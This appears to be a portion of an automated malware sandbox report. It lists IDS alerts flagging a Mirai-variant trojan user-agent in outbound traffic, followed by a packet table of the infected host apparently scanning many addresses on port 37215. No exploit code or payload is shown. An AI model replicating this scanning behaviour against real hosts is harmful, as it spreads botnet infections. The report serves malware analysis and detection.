                                                        192.168.2.14112.146.101.18457878802839471 02/14/24-09:33:25.740961TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5787880192.168.2.14112.146.101.184
                                                        192.168.2.1488.221.134.9738296802839471 02/14/24-09:33:35.353060TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3829680192.168.2.1488.221.134.97
                                                        192.168.2.1495.111.248.6455006802839471 02/14/24-09:32:45.430111TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5500680192.168.2.1495.111.248.64
                                                        192.168.2.1495.216.102.15556426802839471 02/14/24-09:33:16.622756TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5642680192.168.2.1495.216.102.155
                                                        192.168.2.1488.93.245.9839808802839471 02/14/24-09:33:32.495798TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3980880192.168.2.1488.93.245.98
                                                        192.168.2.1495.211.22.14151180802839471 02/14/24-09:33:40.464627TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5118080192.168.2.1495.211.22.141
                                                        192.168.2.1488.221.195.19742968802839471 02/14/24-09:32:45.021096TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4296880192.168.2.1488.221.195.197
                                                        192.168.2.1495.100.79.21037920802839471 02/14/24-09:32:45.409571TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3792080192.168.2.1495.100.79.210
                                                        192.168.2.14112.46.40.15643902802839471 02/14/24-09:33:25.029224TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4390280192.168.2.14112.46.40.156
                                                        192.168.2.1488.102.200.15943658802839471 02/14/24-09:33:10.482052TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4365880192.168.2.1488.102.200.159
                                                        192.168.2.14112.15.125.653170802839471 02/14/24-09:33:22.436208TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5317080192.168.2.14112.15.125.6
                                                        192.168.2.1495.101.17.24241026802839471 02/14/24-09:33:37.278164TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4102680192.168.2.1495.101.17.242
                                                        192.168.2.1488.98.24.22748320802839471 02/14/24-09:32:45.009997TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4832080192.168.2.1488.98.24.227
                                                        192.168.2.14112.90.157.13354858802839471 02/14/24-09:33:21.683376TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5485880192.168.2.14112.90.157.133
                                                        192.168.2.14112.166.123.15936188802839471 02/14/24-09:33:21.646574TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3618880192.168.2.14112.166.123.159
                                                        192.168.2.1488.192.43.22057940802839471 02/14/24-09:33:13.401234TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5794080192.168.2.1488.192.43.220
                                                        192.168.2.1488.218.17.10444462802839471 02/14/24-09:33:35.366865TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4446280192.168.2.1488.218.17.104
                                                        192.168.2.1495.175.103.6660786802839471 02/14/24-09:32:45.048692TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6078680192.168.2.1495.175.103.66
                                                        192.168.2.1495.179.198.4059870802839471 02/14/24-09:33:13.373982TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5987080192.168.2.1495.179.198.40
                                                        192.168.2.1495.100.51.14059090802839471 02/14/24-09:33:40.050023TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5909080192.168.2.1495.100.51.140
                                                        192.168.2.1495.110.166.8849384802839471 02/14/24-09:33:40.283662TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4938480192.168.2.1495.110.166.88
                                                        192.168.2.14112.196.149.11043630802839471 02/14/24-09:33:24.630908TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4363080192.168.2.14112.196.149.110
                                                        192.168.2.1488.81.91.1847370802839471 02/14/24-09:33:22.654676TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4737080192.168.2.1488.81.91.18
                                                        192.168.2.14112.60.23.22235182802839471 02/14/24-09:33:22.821255TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3518280192.168.2.14112.60.23.222
                                                        192.168.2.14112.216.224.9960432802839471 02/14/24-09:33:30.668287TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6043280192.168.2.14112.216.224.99
                                                        192.168.2.1488.221.195.19743010802839471 02/14/24-09:32:45.008597TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4301080192.168.2.1488.221.195.197
                                                        192.168.2.1495.100.55.23041314802839471 02/14/24-09:33:37.272130TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4131480192.168.2.1495.100.55.230
                                                        192.168.2.14112.173.96.22659738802839471 02/14/24-09:33:25.706341TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5973880192.168.2.14112.173.96.226
                                                        192.168.2.1495.100.219.5136738802839471 02/14/24-09:33:30.002042TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3673880192.168.2.1495.100.219.51
                                                        192.168.2.1488.198.209.1443224802839471 02/14/24-09:33:22.637654TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4322480192.168.2.1488.198.209.14
                                                        192.168.2.14112.166.42.21249246802839471 02/14/24-09:33:02.897027TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4924680192.168.2.14112.166.42.212
                                                        192.168.2.1495.173.189.21548756802839471 02/14/24-09:32:56.039998TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4875680192.168.2.1495.173.189.215
                                                        192.168.2.14112.49.54.19836392802839471 02/14/24-09:32:45.566189TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3639280192.168.2.14112.49.54.198
                                                        192.168.2.1495.0.234.4246858802839471 02/14/24-09:32:45.536516TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4685880192.168.2.1495.0.234.42
                                                        192.168.2.1488.99.102.15735546802839471 02/14/24-09:32:46.463578TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3554680192.168.2.1488.99.102.157
                                                        192.168.2.1495.101.190.1857824802839471 02/14/24-09:33:27.268813TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5782480192.168.2.1495.101.190.18
                                                        192.168.2.1495.100.77.17659816802839471 02/14/24-09:33:10.246405TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5981680192.168.2.1495.100.77.176
                                                        192.168.2.1495.32.182.10947478802839471 02/14/24-09:33:37.588186TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4747880192.168.2.1495.32.182.109
                                                        192.168.2.14112.162.247.11339040802839471 02/14/24-09:33:32.251342TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3904080192.168.2.14112.162.247.113
                                                        192.168.2.14112.49.54.19836402802839471 02/14/24-09:32:45.646754TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3640280192.168.2.14112.49.54.198
                                                        192.168.2.1495.100.71.6335568802839471 02/14/24-09:33:29.640737TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3556880192.168.2.1495.100.71.63
                                                        192.168.2.1495.101.40.15357350802839471 02/14/24-09:33:10.050706TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5735080192.168.2.1495.101.40.153
                                                        192.168.2.1495.217.179.12656654802839471 02/14/24-09:33:40.064625TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5665480192.168.2.1495.217.179.126
                                                        192.168.2.1488.198.141.7337972802839471 02/14/24-09:32:56.210187TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3797280192.168.2.1488.198.141.73
                                                        192.168.2.1488.198.244.20044710802839471 02/14/24-09:33:06.167737TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4471080192.168.2.1488.198.244.200
                                                        192.168.2.1488.221.230.9854934802839471 02/14/24-09:33:13.196034TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5493480192.168.2.1488.221.230.98
                                                        192.168.2.1495.111.202.3435956802839471 02/14/24-09:33:16.915796TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3595680192.168.2.1495.111.202.34
                                                        192.168.2.1495.216.20.3953162802839471 02/14/24-09:33:40.289171TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5316280192.168.2.1495.216.20.39
                                                        192.168.2.1488.149.199.8939654802839471 02/14/24-09:33:00.115280TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3965480192.168.2.1488.149.199.89
                                                        192.168.2.1495.216.168.22646666802839471 02/14/24-09:32:56.016425TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4666680192.168.2.1495.216.168.226
                                                        192.168.2.1488.221.176.14633560802839471 02/14/24-09:32:56.188364TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3356080192.168.2.1488.221.176.146
                                                        192.168.2.1495.164.18.13749016802839471 02/14/24-09:33:37.255886TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4901680192.168.2.1495.164.18.137
                                                        192.168.2.1495.216.74.9946370802839471 02/14/24-09:33:27.272022TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4637080192.168.2.1495.216.74.99
                                                        192.168.2.1495.100.116.12451758802839471 02/14/24-09:32:45.012445TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5175880192.168.2.1495.100.116.124
                                                        192.168.2.1488.221.156.5454238802839471 02/14/24-09:32:56.161099TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5423880192.168.2.1488.221.156.54
                                                        192.168.2.1495.101.90.1347462802839471 02/14/24-09:33:40.285234TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4746280192.168.2.1495.101.90.13
                                                        192.168.2.1495.101.220.12152122802839471 02/14/24-09:33:40.056559TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5212280192.168.2.1495.101.220.121
                                                        192.168.2.1495.129.102.10750250802839471 02/14/24-09:33:27.274372TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5025080192.168.2.1495.129.102.107
                                                        192.168.2.14112.250.107.1846360802839471 02/14/24-09:33:04.624887TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4636080192.168.2.14112.250.107.18
                                                        192.168.2.1488.225.225.11944546802839471 02/14/24-09:33:13.452988TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4454680192.168.2.1488.225.225.119
                                                        192.168.2.1495.100.77.17659798802839471 02/14/24-09:33:10.036755TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5979880192.168.2.1495.100.77.176
                                                        192.168.2.1495.64.185.17440988802839471 02/14/24-09:33:27.293023TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4098880192.168.2.1495.64.185.174
                                                        192.168.2.14112.132.209.940300802839471 02/14/24-09:33:27.851196TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4030080192.168.2.14112.132.209.9
                                                        192.168.2.14112.162.116.16734494802839471 02/14/24-09:33:16.392983TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3449480192.168.2.14112.162.116.167
                                                        192.168.2.1488.81.88.15139160802839471 02/14/24-09:33:06.169343TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3916080192.168.2.1488.81.88.151
                                                        192.168.2.14112.133.239.12634350802839471 02/14/24-09:33:16.207341TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3435080192.168.2.14112.133.239.126
                                                        192.168.2.1495.101.250.12549994802839471 02/14/24-09:33:10.035747TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4999480192.168.2.1495.101.250.125
                                                        192.168.2.1495.111.239.20953390802839471 02/14/24-09:33:10.043970TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5339080192.168.2.1495.111.239.209
                                                        192.168.2.1495.197.231.18751512802839471 02/14/24-09:33:10.063998TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5151280192.168.2.1495.197.231.187
                                                        192.168.2.1495.101.226.5048214802839471 02/14/24-09:33:40.038563TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4821480192.168.2.1495.101.226.50
                                                        192.168.2.1495.101.106.13836570802839471 02/14/24-09:33:13.603640TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3657080192.168.2.1495.101.106.138
                                                        192.168.2.1488.221.135.3342228802839471 02/14/24-09:32:45.002998TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4222880192.168.2.1488.221.135.33
                                                        192.168.2.1488.218.251.24842944802839471 02/14/24-09:33:00.359191TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4294480192.168.2.1488.218.251.248
                                                        192.168.2.1488.200.21.15339992802839471 02/14/24-09:33:10.523734TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3999280192.168.2.1488.200.21.153
                                                        192.168.2.1495.101.154.8545934802839471 02/14/24-09:33:10.249481TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4593480192.168.2.1495.101.154.85
                                                        192.168.2.14112.15.125.653172802839471 02/14/24-09:33:21.414981TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5317280192.168.2.14112.15.125.6
                                                        192.168.2.14112.213.88.18945990802839471 02/14/24-09:33:35.161080TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4599080192.168.2.14112.213.88.189
                                                        192.168.2.14112.184.111.10951522802839471 02/14/24-09:33:21.276433TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5152280192.168.2.14112.184.111.109
                                                        192.168.2.1488.216.146.2244594802839471 02/14/24-09:32:46.483754TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4459480192.168.2.1488.216.146.22
                                                        192.168.2.1495.252.118.22657458802839471 02/14/24-09:33:10.064711TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5745880192.168.2.1495.252.118.226
                                                        192.168.2.1495.141.118.16256642802839471 02/14/24-09:33:29.639952TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5664280192.168.2.1495.141.118.162
                                                        192.168.2.1495.58.97.20159078802839471 02/14/24-09:33:37.347079TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5907880192.168.2.1495.58.97.201
                                                        192.168.2.14112.124.41.11845400802839471 02/14/24-09:33:16.565503TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4540080192.168.2.14112.124.41.118
                                                        192.168.2.14112.184.55.18148550802839471 02/14/24-09:33:16.121415TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4855080192.168.2.14112.184.55.181
                                                        192.168.2.1495.173.172.15852130802839471 02/14/24-09:33:29.438613TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5213080192.168.2.1495.173.172.158
                                                        192.168.2.1495.216.8.10359380802839471 02/14/24-09:33:40.290968TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5938080192.168.2.1495.216.8.103
                                                        192.168.2.1488.247.113.355648802839471 02/14/24-09:32:46.507239TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5564880192.168.2.1488.247.113.3
                                                        192.168.2.1495.57.64.18244896802839471 02/14/24-09:32:45.706699TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4489680192.168.2.1495.57.64.182
                                                        192.168.2.14112.165.172.22653562802839471 02/14/24-09:32:56.570334TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5356280192.168.2.14112.165.172.226
                                                        192.168.2.1488.6.1.21954728802839471 02/14/24-09:33:06.598272TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5472880192.168.2.1488.6.1.219
                                                        192.168.2.1495.100.112.9144602802839471 02/14/24-09:32:45.432619TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4460280192.168.2.1495.100.112.91
                                                        192.168.2.1495.101.227.11240374802839471 02/14/24-09:33:40.236932TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4037480192.168.2.1495.101.227.112
                                                        192.168.2.1488.99.171.6955500802839471 02/14/24-09:33:12.980814TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5550080192.168.2.1488.99.171.69
                                                        192.168.2.1495.86.103.19751132802839471 02/14/24-09:33:27.307526TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5113280192.168.2.1495.86.103.197
                                                        192.168.2.1495.215.57.15750290802839471 02/14/24-09:32:45.533275TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5029080192.168.2.1495.215.57.157
                                                        192.168.2.1488.216.197.13653398802839471 02/14/24-09:33:06.361974TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5339880192.168.2.1488.216.197.136
                                                        192.168.2.14112.74.52.21354610802839471 02/14/24-09:33:03.933346TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5461080192.168.2.14112.74.52.213
                                                        192.168.2.14112.168.45.12747720802839471 02/14/24-09:33:04.570465TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4772080192.168.2.14112.168.45.127
                                                        192.168.2.1495.101.105.6633072802839471 02/14/24-09:33:00.088286TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3307280192.168.2.1495.101.105.66
                                                        192.168.2.1495.101.227.22834036802839471 02/14/24-09:33:37.258884TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3403680192.168.2.1495.101.227.228
                                                        192.168.2.1488.221.207.11438410802839471 02/14/24-09:33:10.483962TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3841080192.168.2.1488.221.207.114
                                                        192.168.2.1488.247.182.12936306802839471 02/14/24-09:33:00.141575TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3630680192.168.2.1488.247.182.129
                                                        192.168.2.1495.100.178.8856388802839471 02/14/24-09:33:40.041352TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5638880192.168.2.1495.100.178.88
                                                        192.168.2.14112.197.182.9448240802839471 02/14/24-09:33:03.552227TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4824080192.168.2.14112.197.182.94
                                                        192.168.2.1495.154.219.24653456802839471 02/14/24-09:33:10.228723TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5345680192.168.2.1495.154.219.246
                                                        192.168.2.1488.221.224.16057252802839471 02/14/24-09:33:22.650022TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5725280192.168.2.1488.221.224.160
                                                        192.168.2.1488.133.93.9050442802839471 02/14/24-09:33:00.100048TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5044280192.168.2.1488.133.93.90
                                                        192.168.2.1495.217.171.3250362802839471 02/14/24-09:33:10.290032TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5036280192.168.2.1495.217.171.32
                                                        192.168.2.14112.78.212.860720802839471 02/14/24-09:33:27.782146TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6072080192.168.2.14112.78.212.8
                                                        192.168.2.14112.124.19.22636546802839471 02/14/24-09:33:21.370389TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3654680192.168.2.14112.124.19.226
                                                        192.168.2.14112.49.54.19836416802839471 02/14/24-09:32:45.887655TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3641680192.168.2.14112.49.54.198
                                                        192.168.2.1495.101.219.11344288802839471 02/14/24-09:33:40.281278TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4428880192.168.2.1495.101.219.113
                                                        192.168.2.14112.133.238.25246020802839471 02/14/24-09:32:45.573545TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4602080192.168.2.14112.133.238.252
                                                        192.168.2.14112.185.184.15844896802839471 02/14/24-09:33:35.781339TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4489680192.168.2.14112.185.184.158
                                                        192.168.2.1488.213.229.15953566802839471 02/14/24-09:33:06.161931TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5356680192.168.2.1488.213.229.159
                                                        192.168.2.1495.215.58.22048524802839471 02/14/24-09:32:55.999831TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4852480192.168.2.1495.215.58.220
                                                        192.168.2.14112.185.217.18946504802839471 02/14/24-09:33:27.762744TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4650480192.168.2.14112.185.217.189
                                                        192.168.2.1495.101.151.13458272802839471 02/14/24-09:33:16.596111TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5827280192.168.2.1495.101.151.134

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Feb 14, 2024 09:32:42.784435034 CET3997937215192.168.2.14157.163.163.249
                                                        Feb 14, 2024 09:32:42.784471989 CET3997937215192.168.2.14157.83.106.248
                                                        Feb 14, 2024 09:32:42.784471989 CET3997937215192.168.2.14157.109.70.226
                                                        Feb 14, 2024 09:32:42.784554958 CET3997937215192.168.2.14157.252.42.214
                                                        Feb 14, 2024 09:32:42.784558058 CET3997937215192.168.2.14157.63.198.61
                                                        Feb 14, 2024 09:32:42.784559011 CET3997937215192.168.2.14157.23.14.51
                                                        Feb 14, 2024 09:32:42.784571886 CET3997937215192.168.2.14157.162.165.249
                                                        Feb 14, 2024 09:32:42.784579992 CET3997937215192.168.2.14157.106.100.91
                                                        Feb 14, 2024 09:32:42.784591913 CET3997937215192.168.2.14157.174.3.205
                                                        Feb 14, 2024 09:32:42.784657001 CET3997937215192.168.2.14157.86.50.201
                                                        Feb 14, 2024 09:32:42.784670115 CET3997937215192.168.2.14157.255.250.43
                                                        Feb 14, 2024 09:32:42.784672022 CET3997937215192.168.2.14157.88.11.154
                                                        Feb 14, 2024 09:32:42.784684896 CET3997937215192.168.2.14157.32.240.117
                                                        Feb 14, 2024 09:32:42.784703016 CET3997937215192.168.2.14157.142.204.194
                                                        Feb 14, 2024 09:32:42.784727097 CET3997937215192.168.2.14157.242.230.147
                                                        Feb 14, 2024 09:32:42.784740925 CET3997937215192.168.2.14157.121.91.6
                                                        Feb 14, 2024 09:32:42.784740925 CET3997937215192.168.2.14157.82.151.71
                                                        Feb 14, 2024 09:32:42.784753084 CET3997937215192.168.2.14157.18.139.35
                                                        Feb 14, 2024 09:32:42.784764051 CET3997937215192.168.2.14157.116.135.225
                                                        Feb 14, 2024 09:32:42.784775019 CET3997937215192.168.2.14157.39.25.227
                                                        Feb 14, 2024 09:32:42.784785032 CET3997937215192.168.2.14157.116.143.66
                                                        Feb 14, 2024 09:32:42.784807920 CET3997937215192.168.2.14157.233.75.209
                                                        Feb 14, 2024 09:32:42.784811974 CET3997937215192.168.2.14157.172.5.203
                                                        Feb 14, 2024 09:32:42.784812927 CET3997937215192.168.2.14157.57.118.147
                                                        Feb 14, 2024 09:32:42.784820080 CET3997937215192.168.2.14157.26.31.198
                                                        Feb 14, 2024 09:32:42.784842968 CET3997937215192.168.2.14157.136.60.246
                                                        Feb 14, 2024 09:32:42.784853935 CET3997937215192.168.2.14157.129.56.219
                                                        Feb 14, 2024 09:32:42.784872055 CET3997937215192.168.2.14157.159.173.63
                                                        Feb 14, 2024 09:32:42.784888983 CET3997937215192.168.2.14157.165.238.48
                                                        Feb 14, 2024 09:32:42.784894943 CET3997937215192.168.2.14157.45.250.73
                                                        Feb 14, 2024 09:32:42.784905910 CET3997937215192.168.2.14157.26.131.116
                                                        Feb 14, 2024 09:32:42.784919977 CET3997937215192.168.2.14157.84.132.118
                                                        Feb 14, 2024 09:32:42.784919977 CET3997937215192.168.2.14157.52.146.179
                                                        Feb 14, 2024 09:32:42.784955978 CET3997937215192.168.2.14157.73.101.57
                                                        Feb 14, 2024 09:32:42.784981966 CET3997937215192.168.2.14157.224.18.39
                                                        Feb 14, 2024 09:32:42.784991980 CET3997937215192.168.2.14157.76.169.10
                                                        Feb 14, 2024 09:32:42.784991980 CET3997937215192.168.2.14157.200.164.152
                                                        Feb 14, 2024 09:32:42.785038948 CET3997937215192.168.2.14157.199.178.129
                                                        Feb 14, 2024 09:32:42.785042048 CET3997937215192.168.2.14157.2.176.110
                                                        Feb 14, 2024 09:32:42.785048008 CET3997937215192.168.2.14157.247.62.13
                                                        Feb 14, 2024 09:32:42.785058975 CET3997937215192.168.2.14157.77.123.47
                                                        Feb 14, 2024 09:32:42.785073996 CET3997937215192.168.2.14157.40.93.190
                                                        Feb 14, 2024 09:32:42.785078049 CET3997937215192.168.2.14157.167.250.45
                                                        Feb 14, 2024 09:32:42.785078049 CET3997937215192.168.2.14157.92.171.111
                                                        Feb 14, 2024 09:32:42.785105944 CET3997937215192.168.2.14157.11.133.126
                                                        Feb 14, 2024 09:32:42.785145998 CET3997937215192.168.2.14157.194.204.141
                                                        Feb 14, 2024 09:32:42.785157919 CET3997937215192.168.2.14157.162.0.147
                                                        Feb 14, 2024 09:32:42.785166979 CET3997937215192.168.2.14157.154.249.71
                                                        Feb 14, 2024 09:32:42.785177946 CET3997937215192.168.2.14157.67.15.101
                                                        Feb 14, 2024 09:32:42.785192966 CET3997937215192.168.2.14157.146.254.186
                                                        Feb 14, 2024 09:32:42.785197020 CET3997937215192.168.2.14157.182.119.129
                                                        Feb 14, 2024 09:32:42.785217047 CET3997937215192.168.2.14157.167.24.98
                                                        Feb 14, 2024 09:32:42.785248995 CET3997937215192.168.2.14157.98.137.107
                                                        Feb 14, 2024 09:32:42.785258055 CET3997937215192.168.2.14157.221.104.57
                                                        Feb 14, 2024 09:32:42.785276890 CET3997937215192.168.2.14157.122.46.251
                                                        Feb 14, 2024 09:32:42.785288095 CET3997937215192.168.2.14157.52.17.82
                                                        Feb 14, 2024 09:32:42.785343885 CET3997937215192.168.2.14157.156.50.120
                                                        Feb 14, 2024 09:32:42.785351992 CET3997937215192.168.2.14157.119.18.200
                                                        Feb 14, 2024 09:32:42.785358906 CET3997937215192.168.2.14157.188.9.104
                                                        Feb 14, 2024 09:32:42.785384893 CET3997937215192.168.2.14157.216.230.56
                                                        Feb 14, 2024 09:32:42.785387039 CET3997937215192.168.2.14157.43.37.181
                                                        Feb 14, 2024 09:32:42.785403967 CET3997937215192.168.2.14157.80.107.16
                                                        Feb 14, 2024 09:32:42.785408974 CET3997937215192.168.2.14157.166.144.74
                                                        Feb 14, 2024 09:32:42.785427094 CET3997937215192.168.2.14157.246.154.220
                                                        Feb 14, 2024 09:32:42.785427094 CET3997937215192.168.2.14157.214.201.177
                                                        Feb 14, 2024 09:32:42.785453081 CET3997937215192.168.2.14157.7.35.210
                                                        Feb 14, 2024 09:32:42.785461903 CET3997937215192.168.2.14157.254.234.92
                                                        Feb 14, 2024 09:32:42.785469055 CET3997937215192.168.2.14157.147.176.69
                                                        Feb 14, 2024 09:32:42.785484076 CET3997937215192.168.2.14157.153.34.138
                                                        Feb 14, 2024 09:32:42.785489082 CET3997937215192.168.2.14157.21.7.228
                                                        Feb 14, 2024 09:32:42.785500050 CET3997937215192.168.2.14157.188.117.95
                                                        Feb 14, 2024 09:32:42.785516977 CET3997937215192.168.2.14157.90.40.246
                                                        Feb 14, 2024 09:32:42.785527945 CET3997937215192.168.2.14157.217.188.219
                                                        Feb 14, 2024 09:32:42.785528898 CET3997937215192.168.2.14157.48.116.171
                                                        Feb 14, 2024 09:32:42.785542011 CET3997937215192.168.2.14157.8.188.81
                                                        Feb 14, 2024 09:32:42.785557032 CET3997937215192.168.2.14157.6.108.157
                                                        Feb 14, 2024 09:32:42.785572052 CET3997937215192.168.2.14157.230.39.188
                                                        Feb 14, 2024 09:32:42.785573006 CET3997937215192.168.2.14157.127.130.244
                                                        Feb 14, 2024 09:32:42.785593033 CET3997937215192.168.2.14157.50.5.24
                                                        Feb 14, 2024 09:32:42.785595894 CET3997937215192.168.2.14157.30.126.136
                                                        Feb 14, 2024 09:32:42.785638094 CET3997937215192.168.2.14157.10.120.167
                                                        Feb 14, 2024 09:32:42.785640001 CET3997937215192.168.2.14157.28.76.166
                                                        Feb 14, 2024 09:32:42.785640001 CET3997937215192.168.2.14157.16.155.173
                                                        Feb 14, 2024 09:32:42.785671949 CET3997937215192.168.2.14157.182.179.119
                                                        Feb 14, 2024 09:32:42.785722971 CET3997937215192.168.2.14157.246.189.31
                                                        Feb 14, 2024 09:32:42.785741091 CET3997937215192.168.2.14157.186.171.34
                                                        Feb 14, 2024 09:32:42.785742044 CET3997937215192.168.2.14157.1.216.213
                                                        Feb 14, 2024 09:32:42.785768986 CET3997937215192.168.2.14157.83.124.150
                                                        Feb 14, 2024 09:32:42.785768032 CET3997937215192.168.2.14157.68.12.56
                                                        Feb 14, 2024 09:32:42.785788059 CET3997937215192.168.2.14157.7.205.172
                                                        Feb 14, 2024 09:32:42.785793066 CET3997937215192.168.2.14157.161.39.132
                                                        Feb 14, 2024 09:32:42.785806894 CET3997937215192.168.2.14157.15.238.212
                                                        Feb 14, 2024 09:32:42.785813093 CET3997937215192.168.2.14157.199.164.35
                                                        Feb 14, 2024 09:32:42.785851002 CET3997937215192.168.2.14157.58.106.90
                                                        Feb 14, 2024 09:32:42.785859108 CET3997937215192.168.2.14157.205.94.125
                                                        Feb 14, 2024 09:32:42.785882950 CET3997937215192.168.2.14157.98.42.71
